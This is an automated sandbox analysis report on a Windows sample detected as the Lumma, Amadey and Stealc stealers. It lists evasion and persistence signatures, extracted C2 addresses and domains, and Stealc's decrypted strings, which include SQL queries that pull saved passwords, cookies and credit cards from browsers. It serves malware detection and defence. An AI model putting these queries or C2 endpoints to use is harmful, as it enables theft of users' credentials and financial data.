Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545721
MD5: c12612c3792dee7b90e2d01ca6e32d2d
SHA1: acf86245216963952d03d263b99b8ba460fc8a0e
SHA256: 536df35d391272dc912f4f4b37dd7551ea2e549a1e8b3dab20c411c1c8afb7ef
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

barindex
Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\EGCHWF62L351BCP5BKZSSW.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000005.00000003.2352124084.00000000055B0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: c1b0009d40.exe.6552.25.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "presticitpo.store", "thumbystriw.store", "founpiuer.store", "scriptyprefej.store", "navygenerayk.store", "fadehairucw.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe ReversingLabs: Detection: 95%
Source: file.exe ReversingLabs: Detection: 42%
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E7HQ3XMUO6VYIDJ3F2DE2.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EGCHWF62L351BCP5BKZSSW.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: 30
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: 11
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: 20
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: 24
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetProcAddress
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: LoadLibraryA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: lstrcatA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: OpenEventA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CreateEventA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CloseHandle
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Sleep
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: VirtualFree
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetSystemInfo
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: VirtualAlloc
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: HeapAlloc
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetComputerNameA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: lstrcpyA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetProcessHeap
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetCurrentProcess
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: lstrlenA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ExitProcess
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetSystemTime
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: advapi32.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: gdi32.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: user32.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: crypt32.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ntdll.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetUserNameA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CreateDCA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetDeviceCaps
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ReleaseDC
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sscanf
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: VMwareVMware
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: HAL9TH
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: JohnDoe
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: DISPLAY
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: http://185.215.113.206
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: bksvnsj
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: /6c4adf523b719729.php
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: /746f34465cf17784/
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: tale
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetFileAttributesA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GlobalLock
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: HeapFree
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetFileSize
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GlobalSize
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: IsWow64Process
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Process32Next
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetLocalTime
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: FreeLibrary
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetVolumeInformationA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Process32First
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetLocaleInfoA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetModuleFileNameA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: DeleteFileA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: FindNextFileA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: LocalFree
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: FindClose
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: LocalAlloc
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetFileSizeEx
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ReadFile
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SetFilePointer
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: WriteFile
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CreateFileA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: FindFirstFileA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CopyFileA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: VirtualProtect
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetLastError
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: lstrcpynA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: MultiByteToWideChar
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GlobalFree
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: WideCharToMultiByte
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GlobalAlloc
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: OpenProcess
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: TerminateProcess
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetCurrentProcessId
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: gdiplus.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ole32.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: bcrypt.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: wininet.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: shlwapi.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: shell32.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: psapi.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: rstrtmgr.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SelectObject
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: BitBlt
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: DeleteObject
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CreateCompatibleDC
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GdipGetImageEncoders
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GdiplusStartup
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GdiplusShutdown
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GdipSaveImageToStream
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GdipDisposeImage
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GdipFree
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetHGlobalFromStream
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CoUninitialize
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CoInitialize
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CoCreateInstance
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: BCryptDecrypt
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: BCryptSetProperty
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: BCryptDestroyKey
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetWindowRect
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetDesktopWindow
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetDC
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CloseWindow
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: wsprintfA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CharToOemW
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: wsprintfW
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: RegQueryValueExA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: RegEnumKeyExA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: RegOpenKeyExA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: RegCloseKey
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: RegEnumValueA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CryptBinaryToStringA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: CryptUnprotectData
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SHGetFolderPathA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: ShellExecuteExA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: InternetOpenUrlA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: InternetConnectA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: InternetCloseHandle
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: InternetOpenA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: HttpSendRequestA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: HttpOpenRequestA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: InternetReadFile
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: InternetCrackUrlA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: StrCmpCA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: StrStrA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: StrCmpCW
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: PathMatchSpecA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: GetModuleFileNameExA
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: RmStartSession
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: RmRegisterResources
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: RmGetList
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: RmEndSession
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sqlite3_open
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sqlite3_step
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sqlite3_column_text
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sqlite3_finalize
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sqlite3_close
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sqlite3_column_bytes
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: sqlite3_column_blob
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: encrypted_key
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: PATH
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: NSS_Init
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: NSS_Shutdown
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: PK11_FreeSlot
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: PK11_Authenticate
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: C:\ProgramData\
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: browser:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: profile:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: url:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: login:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: password:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Opera
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: OperaGX
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Network
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: cookies
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: .txt
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: TRUE
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: FALSE
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: autofill
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: history
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: cc
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: name:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: month:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: year:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: card:
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Cookies
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Login Data
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Web Data
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: History
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: logins.json
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: formSubmitURL
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: usernameField
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: encryptedUsername
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: encryptedPassword
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: guid
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: cookies.sqlite
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: formhistory.sqlite
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: places.sqlite
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: plugins
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Local Extension Settings
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Sync Extension Settings
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: IndexedDB
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Opera Stable
Source: 31.2.7a5878ed96.exe.5c0000.0.unpack String decryptor: Opera GX Stable
